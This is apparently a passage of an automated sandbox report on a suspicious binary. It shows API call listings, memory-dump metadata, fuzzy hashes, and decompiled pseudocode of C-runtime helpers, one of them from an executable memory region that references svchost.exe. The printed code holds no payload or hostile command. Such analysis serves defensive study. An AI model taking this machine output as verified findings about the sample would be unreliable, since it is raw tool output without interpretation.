    0x00000000
    0x6d868664
    0x6d868624
    0x6d868629
    0x6d86862b
    0x00000000
    0x00000000
    0x00000000
    0x6d86862b
    0x6d868609
    0x00000000
    0x6d868614
    0x6d8685cb
    0x6d8685ce
    0x6d8685d1
    0x6d8685e4
    0x6d8685e7
    0x6d8685ba
    0x6d8685ba
    0x00000000
    0x6d8685bd
    0x6d8685d7
    0x6d8685dc
    0x6d8685de
    0x6d868668
    0x6d868668
    0x00000000
    0x6d8685de
    0x6d8685a8
    0x6d8685ad
    0x6d8685b2
    0x6d8685b4
    0x6d8685b7
    0x00000000

    APIs
      • Part of subcall function 6D868BBC: _free.LIBCMT ref: 6D868BCA
      • Part of subcall function 6D869796: WideCharToMultiByte.KERNEL32(?,00000000,6D86A4BF,00000000,00000001,6D86A44E,6D86C4B3,?,6D86A4BF,?,00000000,?,6D86C222,0000FDE9,00000000,?), ref: 6D869838
    • GetLastError.KERNEL32 ref: 6D868602
    • __dosmaperr.LIBCMT ref: 6D868609
    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6D868648
    • __dosmaperr.LIBCMT ref: 6D86864F
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
    • String ID:
    • API String ID: 167067550-0
    • Opcode ID: fe4a7e9ee2067474cab6b00a432cb4cbbe6fd6e72ff571e8d694f42afb48efc5
    • Instruction ID: d46cd864669ec14ecfc5efeb9ab15a56bcdb1c20371b7ed8838323f52a4b5873
    • Opcode Fuzzy Hash: fe4a7e9ee2067474cab6b00a432cb4cbbe6fd6e72ff571e8d694f42afb48efc5
    • Instruction Fuzzy Hash: 30218171608686AF9B119F698C8DD6BB7BDFF063787018918FA1D97180EB31DC408AB1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetLastError.KERNEL32(?,0000005C,?,030349A4,0000005C,?,?,?,03034ABB,?,?,?,00000000,svchost.exe,?,0000005C), ref: 03037BF8
    • _free.LIBCMT ref: 03037C55
    • _free.LIBCMT ref: 03037C8B
    • SetLastError.KERNEL32(00000000,0000000A,000000FF,?,?,03034ABB,?,?,?,00000000,svchost.exe,?,0000005C), ref: 03037C96
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: e4442b2de44b42b3686edb355c04464fe9f1c7a296037cfa059f81af44ededf6
    • Instruction ID: db5a1b84afb67957109b6a38d1d659611b04fc4d8e5bfddc79ac813e48c54540
    • Opcode Fuzzy Hash: e4442b2de44b42b3686edb355c04464fe9f1c7a296037cfa059f81af44ededf6
    • Instruction Fuzzy Hash: 1D1129FA3537017FDA60F6B5AD84EAB238D8BC7A757280A28F5349B1C1EF2588054960
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E6D868066(void* __ecx, void* __edx) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t2;
    				long _t3;
    				intOrPtr _t5;
    				long _t6;
    				intOrPtr _t9;
    				long _t10;
    				signed int _t39;
    				signed int _t40;
    				void* _t43;
    				void* _t49;
    				signed int _t51;
    				signed int _t53;
    				signed int _t54;
    				long _t56;
    				long _t60;
    				long _t61;
    				void* _t65;
    
    				_t49 = __edx;
    				_t43 = __ecx;
    				_t60 = GetLastError();
    				_t2 =  *0x6d877060; // 0x8
    				_t67 = _t2 - 0xffffffff;
    				if(_t2 == 0xffffffff) {
    					L6:
    					_t3 = E6D869BB2(__eflags, _t2, 0xffffffff);
    					__eflags = _t3;
    					if(_t3 == 0) {
    						goto L3;
    					} else {
    						_t51 = E6D868473(1, 0x364);
    						_pop(_t43);
    						__eflags = _t51;
    						if(__eflags != 0) {
    							__eflags = E6D869BB2(__eflags,  *0x6d877060, _t51);
    							if(__eflags != 0) {
    								E6D867E68(_t51, 0x6d8c1a30);
    								E6D867CC2(0);
    								_t65 = _t65 + 0xc;
    								goto L13;
    							} else {
    								_t39 = 0;
    								E6D869BB2(__eflags,  *0x6d877060, 0);
    								_push(_t51);
    								goto L9;
    							}
    						} else {
    							_t39 = 0;
    							__eflags = 0;
    							E6D869BB2(0,  *0x6d877060, 0);
    							_push(0);
    							L9:
    							E6D867CC2();
    							_pop(_t43);
    							goto L4;
    						}
    					}
    				} else {
    					_t51 = E6D869B73(_t67, _t2);
    					if(_t51 == 0) {
    						_t2 =  *0x6d877060; // 0x8
    						goto L6;
    					} else {
    						if(_t51 != 0xffffffff) {
    							L13:
    							_t39 = _t51;
    						} else {
    							L3:
    							_t39 = 0;
    							L4:
    							_t51 = _t39;
    						}
    					}
    				}
    				SetLastError(_t60);
    				asm("sbb edi, edi");
    				_t53 =  ~_t51 & _t39;
    				if(_t53 == 0) {
    					E6D867AB7(_t39, _t43, _t49, _t53, _t60);
    					asm("int3");
    					_t5 =  *0x6d877060; // 0x8
    					_push(_t60);
    					__eflags = _t5 - 0xffffffff;
    					if(__eflags == 0) {
    						L22:
    						_t6 = E6D869BB2(__eflags, _t5, 0xffffffff);
    						__eflags = _t6;
    						if(_t6 == 0) {
    							goto L31;
    						} else {
    							_t60 = E6D868473(1, 0x364);
    							_pop(_t43);
    							__eflags = _t60;
    							if(__eflags != 0) {
    								__eflags = E6D869BB2(__eflags,  *0x6d877060, _t60);
    								if(__eflags != 0) {
    									E6D867E68(_t60, 0x6d8c1a30);
    									E6D867CC2(0);
    									_t65 = _t65 + 0xc;
    									goto L29;
    								} else {
    									E6D869BB2(__eflags,  *0x6d877060, _t21);
    									_push(_t60);
    									goto L25;
    								}
    							} else {
    								E6D869BB2(__eflags,  *0x6d877060, _t20);
    								_push(_t60);
    								L25:
    								E6D867CC2();
    								_pop(_t43);
    								goto L31;
    							}
    						}
    					} else {
    						_t60 = E6D869B73(__eflags, _t5);
    						__eflags = _t60;
    						if(__eflags == 0) {
    							_t5 =  *0x6d877060; // 0x8
    							goto L22;
    						} else {
    							__eflags = _t60 - 0xffffffff;
    							if(_t60 == 0xffffffff) {
    								L31:
    								E6D867AB7(_t39, _t43, _t49, _t53, _t60);
    								asm("int3");
    								_push(_t39);
    								_push(_t60);
    								_push(_t53);
    								_t61 = GetLastError();
    								_t9 =  *0x6d877060; // 0x8
    								__eflags = _t9 - 0xffffffff;
    								if(__eflags == 0) {
    									L38:
    									_t10 = E6D869BB2(__eflags, _t9, 0xffffffff);
    									__eflags = _t10;
    									if(_t10 == 0) {
    										goto L35;
    									} else {
    										_t54 = E6D868473(1, 0x364);
    										__eflags = _t54;
    										if(__eflags != 0) {
    											__eflags = E6D869BB2(__eflags,  *0x6d877060, _t54);
    											if(__eflags != 0) {
    												E6D867E68(_t54, 0x6d8c1a30);
    												E6D867CC2(0);
    												goto L45;
    											} else {
    												_t40 = 0;
    												E6D869BB2(__eflags,  *0x6d877060, 0);
    												_push(_t54);
    												goto L41;
    											}
    										} else {
    											_t40 = 0;
    											__eflags = 0;
    											E6D869BB2(0,  *0x6d877060, 0);
    											_push(0);
    											L41:
    											E6D867CC2();
    											goto L36;
    										}
    									}
    								} else {
    									_t54 = E6D869B73(__eflags, _t9);
    									__eflags = _t54;
    									if(__eflags == 0) {
    										_t9 =  *0x6d877060; // 0x8
    										goto L38;
    									} else {
    										__eflags = _t54 - 0xffffffff;
    										if(_t54 != 0xffffffff) {
    											L45:
    											_t40 = _t54;
    										} else {
    											L35:
    											_t40 = 0;
    											__eflags = 0;
    											L36:
    											_t54 = _t40;
    										}
    									}
    								}
    								SetLastError(_t61);
    								asm("sbb edi, edi");
    								_t56 =  ~_t54 & _t40;
    								__eflags = _t56;
    								return _t56;
    							} else {
    								L29:
    								__eflags = _t60;
    								if(_t60 == 0) {
    									goto L31;
    								} else {
    									return _t60;
    								}
    							}
    						}
    					}
    				} else {
    					return _t53;
    				}
    			}























    0x6d868066
    0x6d868066
    0x6d868071
    0x6d868073
    0x6d868078
    0x6d86807b
    0x6d868099
    0x6d86809c
    0x6d8680a1
    0x6d8680a3
    0x00000000
    0x6d8680a5
    0x6d8680b1
    0x6d8680b4
    0x6d8680b5
    0x6d8680b7
    0x6d8680dc
    0x6d8680de
    0x6d8680f7
    0x6d8680fe
    0x6d868103
    0x00000000
    0x6d8680e0
    0x6d8680e0
    0x6d8680e9
    0x6d8680ee
    0x00000000
    0x6d8680ee
    0x6d8680b9
    0x6d8680b9
    0x6d8680b9
    0x6d8680c2
    0x6d8680c7
    0x6d8680c8
    0x6d8680c8
    0x6d8680cd
    0x00000000
    0x6d8680cd
    0x6d8680b7
    0x6d86807d
    0x6d868083
    0x6d868087
    0x6d868094
    0x00000000
    0x6d868089
    0x6d86808c
    0x6d868106
    0x6d868106
    0x6d86808e
    0x6d86808e
    0x6d86808e
    0x6d868090
    0x6d868090
    0x6d868090
    0x6d86808c
    0x6d868087
    0x6d868109
    0x6d868111
    0x6d868113
    0x6d868115
    0x6d86811d
    0x6d868122
    0x6d868123
    0x6d868128
    0x6d868129
    0x6d86812c
    0x6d868146
    0x6d868149
    0x6d86814e
    0x6d868150
    0x00000000
    0x6d868152
    0x6d86815e
    0x6d868161
    0x6d868162
    0x6d868164
    0x6d868187
    0x6d868189
    0x6d8681a0
    0x6d8681a7
    0x6d8681ac
    0x00000000
    0x6d86818b
    0x6d868192
    0x6d868197
    0x00000000
    0x6d868197
    0x6d868166
    0x6d86816d
    0x6d868172
    0x6d868173
    0x6d868173
    0x6d868178
    0x00000000
    0x6d868178
    0x6d868164
    0x6d86812e
    0x6d868134
    0x6d868136
    0x6d868138
    0x6d868141
    0x00000000
    0x6d86813a
    0x6d86813a
    0x6d86813d
    0x6d8681b7
    0x6d8681b7
    0x6d8681bc
    0x6d8681bf
    0x6d8681c0
    0x6d8681c1
    0x6d8681c8
    0x6d8681ca
    0x6d8681cf
    0x6d8681d2
    0x6d8681f0
    0x6d8681f3
    0x6d8681f8
    0x6d8681fa
    0x00000000
    0x6d8681fc
    0x6d868208
    0x6d86820c
    0x6d86820e
    0x6d868233
    0x6d868235
    0x6d86824e
    0x6d868255
    0x00000000
    0x6d868237
    0x6d868237
    0x6d868240
    0x6d868245
    0x00000000
    0x6d868245
    0x6d868210
    0x6d868210
    0x6d868210
    0x6d868219
    0x6d86821e
    0x6d86821f
    0x6d86821f
    0x00000000
    0x6d868224
    0x6d86820e
    0x6d8681d4
    0x6d8681da
    0x6d8681dc
    0x6d8681de
    0x6d8681eb
    0x00000000
    0x6d8681e0
    0x6d8681e0
    0x6d8681e3
    0x6d86825d
    0x6d86825d
    0x6d8681e5
    0x6d8681e5
    0x6d8681e5
    0x6d8681e5
    0x6d8681e7
    0x6d8681e7
    0x6d8681e7
    0x6d8681e3
    0x6d8681de
    0x6d868260
    0x6d868268
    0x6d86826a
    0x6d86826a
    0x6d868271
    0x6d86813f
    0x6d8681af
    0x6d8681af
    0x6d8681b1
    0x00000000
    0x6d8681b3
    0x6d8681b6
    0x6d8681b6
    0x6d8681b1
    0x6d86813d
    0x6d868138
    0x6d868117
    0x6d86811c
    0x6d86811c

    APIs
    • GetLastError.KERNEL32(?,?,?,6D86BF69,00000000,00000001,6D86A4BF,?,6D86C428,00000001,?,?,?,6D86A44E,?,00000000), ref: 6D86806B
    • _free.LIBCMT ref: 6D8680C8
    • _free.LIBCMT ref: 6D8680FE
    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,6D86C428,00000001,?,?,?,6D86A44E,?,00000000,00000000,6D875808,0000002C,6D86A4BF), ref: 6D868109
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: 7a82675bd0c3325a99f93c333c3803c51ad3698b4da1ffc70e2c7988dd4db7f9
    • Instruction ID: e079edcb2a9d9e8075716fbaed06d3952a3021c81d5be92043d52d25bae199b7
    • Opcode Fuzzy Hash: 7a82675bd0c3325a99f93c333c3803c51ad3698b4da1ffc70e2c7988dd4db7f9
    • Instruction Fuzzy Hash: B711C672A4C69A2ADB11567C4C8CF2E257AEFC7779B124E24F728962C0DF718C0182B1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetLastError.KERNEL32(?,?,?,0303787B,03037F65,?,?,0303727A), ref: 03037D4F
    • _free.LIBCMT ref: 03037DAC
    • _free.LIBCMT ref: 03037DE2
    • SetLastError.KERNEL32(00000000,0000000A,000000FF,?,?,0303787B,03037F65,?,?,0303727A), ref: 03037DED
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: 8d6646994e11c62843702c66f4ccc2690bb33ead3d4d554f1e36cfed2e86cacd
    • Instruction ID: 30b578f6e48a200d7d7dc130a24f31e9d994278b74878132ee5011903737be4b
    • Opcode Fuzzy Hash: 8d6646994e11c62843702c66f4ccc2690bb33ead3d4d554f1e36cfed2e86cacd
    • Instruction Fuzzy Hash: 891148FA3477417FE661F6B99C80EBB22ADDFC39717240724F528DA1C0DF2488058560
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E6D8681BD(void* __ecx) {
    				intOrPtr _t2;
    				signed int _t3;
    				signed int _t13;
    				signed int _t18;
    				long _t21;
    
    				_t21 = GetLastError();
    				_t2 =  *0x6d877060; // 0x8
    				_t24 = _t2 - 0xffffffff;
    				if(_t2 == 0xffffffff) {
    					L6:
    					_t3 = E6D869BB2(__eflags, _t2, 0xffffffff);
    					__eflags = _t3;
    					if(_t3 == 0) {
    						goto L3;
    					} else {
    						_t18 = E6D868473(1, 0x364);
    						__eflags = _t18;
    						if(__eflags != 0) {
    							__eflags = E6D869BB2(__eflags,  *0x6d877060, _t18);
    							if(__eflags != 0) {
    								E6D867E68(_t18, 0x6d8c1a30);
    								E6D867CC2(0);
    								goto L13;
    							} else {
    								_t13 = 0;
    								E6D869BB2(__eflags,  *0x6d877060, 0);
    								_push(_t18);
    								goto L9;
    							}
    						} else {
    							_t13 = 0;
    							__eflags = 0;
    							E6D869BB2(0,  *0x6d877060, 0);
    							_push(0);
    							L9:
    							E6D867CC2();
    							goto L4;
    						}
    					}
    				} else {
    					_t18 = E6D869B73(_t24, _t2);
    					if(_t18 == 0) {
    						_t2 =  *0x6d877060; // 0x8
    						goto L6;
    					} else {
    						if(_t18 != 0xffffffff) {
    							L13:
    							_t13 = _t18;
    						} else {
    							L3:
    							_t13 = 0;
    							L4:
    							_t18 = _t13;
    						}
    					}
    				}
    				SetLastError(_t21);
    				asm("sbb edi, edi");
    				return  ~_t18 & _t13;
    			}








    0x6d8681c8
    0x6d8681ca
    0x6d8681cf
    0x6d8681d2
    0x6d8681f0
    0x6d8681f3
    0x6d8681f8
    0x6d8681fa
    0x00000000
    0x6d8681fc
    0x6d868208
    0x6d86820c
    0x6d86820e
    0x6d868233
    0x6d868235
    0x6d86824e
    0x6d868255
    0x00000000
    0x6d868237
    0x6d868237
    0x6d868240
    0x6d868245
    0x00000000
    0x6d868245
    0x6d868210
    0x6d868210
    0x6d868210
    0x6d868219
    0x6d86821e
    0x6d86821f
    0x6d86821f
    0x00000000
    0x6d868224
    0x6d86820e
    0x6d8681d4
    0x6d8681da
    0x6d8681de
    0x6d8681eb
    0x00000000
    0x6d8681e0
    0x6d8681e3
    0x6d86825d
    0x6d86825d
    0x6d8681e5
    0x6d8681e5
    0x6d8681e5
    0x6d8681e7
    0x6d8681e7
    0x6d8681e7
    0x6d8681e3
    0x6d8681de
    0x6d868260
    0x6d868268
    0x6d868271

    APIs
    • GetLastError.KERNEL32(00000001,6D863211,00000000,6D866A60,6D868437,00000000,?,6D8642B3,6D863211,?,6D863211,00000008,?,?,6D861249,00000000), ref: 6D8681C2
    • _free.LIBCMT ref: 6D86821F
    • _free.LIBCMT ref: 6D868255
    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,6D8642B3,6D863211,?,6D863211,00000008,?,?,6D861249,00000000), ref: 6D868260
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: f936171df50c5ed27c0397480800bad4630d75829edff32383ea479afea0e499
    • Instruction ID: 5c82cfe0da4660bdbb32324c6954c5c1bdee7af626a398a00a01aad543fcadda
    • Opcode Fuzzy Hash: f936171df50c5ed27c0397480800bad4630d75829edff32383ea479afea0e499
    • Instruction Fuzzy Hash: 4511E93264C5A52ADB015A7D5C9CF2A217AEBC7778B220E25F728D23C0DF718C01C2B0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 03066127
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 03066140
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: Value___vcrt_
    • String ID:
    • API String ID: 1426506684-0
    • Opcode ID: 6fbc555b6aee27532a3083f087b3daad81328d89770240409ef6b30b17a819d2
    • Instruction ID: aafc619f6c36c7ec261bc8b07a37fc8df43f389a2d0a81ea1af8b55cb352923f
    • Opcode Fuzzy Hash: 6fbc555b6aee27532a3083f087b3daad81328d89770240409ef6b30b17a819d2
    • Instruction Fuzzy Hash: AB01FC3760B3399EF656D7789CC869A26E9EB89674728432AF5684D0FAEF6288004144
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0304E75C
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0304E775
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: Value___vcrt_
    • String ID:
    • API String ID: 1426506684-0
    • Opcode ID: 6a310bdaba1b2cd53659a7e1174290113c22bea05de4fe7c1e04e8790538a4ff
    • Instruction ID: 643ddff562542bac607532b9b2e7ca61cd13af1f6273eb3da7e786bd29e27004
    • Opcode Fuzzy Hash: 6a310bdaba1b2cd53659a7e1174290113c22bea05de4fe7c1e04e8790538a4ff
    • Instruction Fuzzy Hash: C10128B650B3226DF625F7B5FCC8A5B2699FB496B67240339E310580F0EFA14900C150
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,0303FAE5,?,00000001,?,00000001,?,0303E98B,?,?,00000001), ref: 03040E7D
    • GetLastError.KERNEL32(?,0303FAE5,?,00000001,?,00000001,?,0303E98B,?,?,00000001,?,00000001,?,0303EED7,0303B5DD), ref: 03040E89
      • Part of subcall function 03040E4F: CloseHandle.KERNEL32(FFFFFFFE,03040E99,?,0303FAE5,?,00000001,?,00000001,?,0303E98B,?,?,00000001,?,00000001), ref: 03040E5F
    • ___initconout.LIBCMT ref: 03040E99
      • Part of subcall function 03040E11: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,03040E40,0303FAD2,00000001,?,0303E98B,?,?,00000001,?), ref: 03040E24
    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,0303FAE5,?,00000001,?,00000001,?,0303E98B,?,?,00000001,?), ref: 03040EAE
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    • Opcode ID: 65e1ba1b84e7a161a694dda5824a4181cc0c69a63e382f3b76da69dfe238940e
    • Instruction ID: 1f805ce33a2f2be1aa7d617c4d213d9c90fed34c1682c3dd800807ae51674d9e
    • Opcode Fuzzy Hash: 65e1ba1b84e7a161a694dda5824a4181cc0c69a63e382f3b76da69dfe238940e
    • Instruction Fuzzy Hash: 0FF0377A403224FBCF22BF97DC04B8A7F66FB45270B054064FA1895120C736DA70DB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D86D1B6(void* _a4, long _a8, DWORD* _a12) {
    				void* _t13;
    
    				_t13 = WriteConsoleW( *0x6d877860, _a4, _a8, _a12, 0);
    				if(_t13 == 0 && GetLastError() == 6) {
    					E6D86D19F();
    					E6D86D161();
    					_t13 = WriteConsoleW( *0x6d877860, _a4, _a8, _a12, _t13);
    				}
    				return _t13;
    			}




    0x6d86d1d3
    0x6d86d1d7
    0x6d86d1e4
    0x6d86d1e9
    0x6d86d204
    0x6d86d204
    0x6d86d20a

    APIs
    • WriteConsoleW.KERNEL32(?,?,6D86A4BF,00000000,?,?,6D86CC1A,?,00000001,?,00000001,?,6D86BEF8,00000000,00000000,00000001), ref: 6D86D1CD
    • GetLastError.KERNEL32(?,6D86CC1A,?,00000001,?,00000001,?,6D86BEF8,00000000,00000000,00000001,00000000,00000001,?,6D86C44C,6D86A44E), ref: 6D86D1D9
      • Part of subcall function 6D86D19F: CloseHandle.KERNEL32(FFFFFFFE,6D86D1E9,?,6D86CC1A,?,00000001,?,00000001,?,6D86BEF8,00000000,00000000,00000001,00000000,00000001), ref: 6D86D1AF
    • ___initconout.LIBCMT ref: 6D86D1E9
      • Part of subcall function 6D86D161: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D86D190,6D86CC07,00000001,?,6D86BEF8,00000000,00000000,00000001,00000000), ref: 6D86D174
    • WriteConsoleW.KERNEL32(?,?,6D86A4BF,00000000,?,6D86CC1A,?,00000001,?,00000001,?,6D86BEF8,00000000,00000000,00000001,00000000), ref: 6D86D1FE
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    • Opcode ID: 7d371c41440d2162219bebc01e38cfda245a38b6af33320fe0bba5ba1deb73a3
    • Instruction ID: bc8cc81ee4ce0ddff2adeb3c48a2e87e18c53fe2b3fb4843db4e53e1c02df860
    • Opcode Fuzzy Hash: 7d371c41440d2162219bebc01e38cfda245a38b6af33320fe0bba5ba1deb73a3
    • Instruction Fuzzy Hash: 8CF09836904269BBCF121E96CC0CE9E7F76FB4B3B1F154410FA2895220CB329860DBE4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E6D86424B(long _a4) {
    				long _t3;
    				intOrPtr* _t7;
    
    				_t7 =  *0x6d8c1048;
    				if(_t7 == 0) {
    					LeaveCriticalSection(0x6d8c1030);
    					_t3 = WaitForSingleObjectEx( *0x6d8c102c, _a4, 0);
    					EnterCriticalSection(0x6d8c1030);
    					return _t3;
    				}
    				 *0x6d870168(0x6d8c1028, 0x6d8c1030, _a4);
    				return  *_t7();
    			}





    0x6d86424f
    0x6d864257
    0x6d864278
    0x6d864289
    0x6d864290
    0x00000000
    0x6d864290
    0x6d864268
    0x00000000

    APIs
    • SleepConditionVariableCS.KERNELBASE(?,6D8641E8,00000064), ref: 6D86426E
    • LeaveCriticalSection.KERNEL32(6D8C1030,?,?,6D8641E8,00000064,?,74B5EA30,?,6D8611AB,6D8C1A7C), ref: 6D864278
    • WaitForSingleObjectEx.KERNEL32(?,00000000,?,6D8641E8,00000064,?,74B5EA30,?,6D8611AB,6D8C1A7C), ref: 6D864289
    • EnterCriticalSection.KERNEL32(6D8C1030,?,6D8641E8,00000064,?,74B5EA30,?,6D8611AB,6D8C1A7C), ref: 6D864290
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
    • String ID:
    • API String ID: 3269011525-0
    • Opcode ID: 473249712d86331bd68a89354a520f67f796ade3510632af964357dd69a1f154
    • Instruction ID: 93a0c7a3fa101c11acf7e9d59e9d8fd32c93eebf4d60d76df5d56468c3c2539d
    • Opcode Fuzzy Hash: 473249712d86331bd68a89354a520f67f796ade3510632af964357dd69a1f154
    • Instruction Fuzzy Hash: 6BE06532802474EBCF021BA68C8CB9E3B79BB0F7A1B104411FA04A2200CB229810CBE6
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • _free.LIBCMT ref: 0303737B
      • Part of subcall function 03037F3F: HeapFree.KERNEL32(00000000,00000000,?,0303727A), ref: 03037F55
      • Part of subcall function 03037F3F: GetLastError.KERNEL32(?,?,0303727A), ref: 03037F67
    • _free.LIBCMT ref: 0303738E
    • _free.LIBCMT ref: 0303739F
    • _free.LIBCMT ref: 030373B0
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: e9874623f81e4ce9139fa85776699842b6650e736a367328f38f30c26584217f
    • Instruction ID: 8e898445c29d6db73905fda1824d44da112b19019e823ef421b7dae6cf306fda
    • Opcode Fuzzy Hash: e9874623f81e4ce9139fa85776699842b6650e736a367328f38f30c26584217f
    • Instruction Fuzzy Hash: 7CE026B9C27634EE9712BF2CB9048993BB9B7D5B603010116E4247B21CDB390522EBC5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D867923() {
    
    				E6D867CC2( *0x6d8c1a3c);
    				 *0x6d8c1a3c = 0;
    				E6D867CC2( *0x6d8c1a40);
    				 *0x6d8c1a40 = 0;
    				E6D867CC2( *0x6d8c1728);
    				 *0x6d8c1728 = 0;
    				E6D867CC2( *0x6d8c172c);
    				 *0x6d8c172c = 0;
    				return 1;
    			}



    0x6d86792c
    0x6d867939
    0x6d86793f
    0x6d86794a
    0x6d867950
    0x6d86795b
    0x6d867961
    0x6d867969
    0x6d867972

    APIs
    • _free.LIBCMT ref: 6D86792C
      • Part of subcall function 6D867CC2: HeapFree.KERNEL32(00000000,00000000,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?), ref: 6D867CD8
      • Part of subcall function 6D867CC2: GetLastError.KERNEL32(?,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?,?), ref: 6D867CEA
    • _free.LIBCMT ref: 6D86793F
    • _free.LIBCMT ref: 6D867950
    • _free.LIBCMT ref: 6D867961
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
